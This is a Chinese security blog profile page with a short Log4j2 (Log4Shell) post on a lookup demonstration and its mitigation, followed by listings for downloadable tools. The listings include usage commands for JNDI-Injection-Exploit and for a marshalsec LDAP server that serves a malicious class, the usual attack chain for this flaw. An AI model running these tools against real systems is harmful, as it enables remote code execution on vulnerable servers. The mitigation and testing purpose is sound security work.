- 博客(1)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 log4j2漏洞
1、实验实验对象:Log4j2版本(注意不是log4j1.x版本)实验版本:Jdk1.8.131 log4j-core2.11.1问题代码:${date:YYYY-MM-dd}被解析成时间2022-04-062、临时解决方案:1、设置jvm参数 “-Dlog4j2.formatMsgNoLookups=true” 2、(推荐)设置“log4j2.formatMsgNoLookups=True”以第二条方案为例,亲测有效:执行后效果:...
2022-05-27 11:14:59
495
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
整合rmi和ldap服务器+恶意类,使用方法:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
where:
-C - command executed in the remote classfile.
(optional , default command is "open /Applications/Calculator.app")
-A - the address of your server, maybe an IP address or a domain.
(optional , default address is the first network interface address)
2022-05-27
代码审计文档(包括修复方案)
代码审计文档整合了24钟高危漏洞,漏洞包括:xss、sql注入、xml注入、各种反序列化等。并对其提供了代码分析、提供修复方案、以及漏洞代码示范,适用于入门者学习参考
2022-05-27
marshalsec-0.0.3-SNAPSHOT-all.jar
用于搭建ldap和rmi服务器,用来进行jndi注入测试
使用方法示例:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "恶意类http地址" 9999
2022-05-27
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人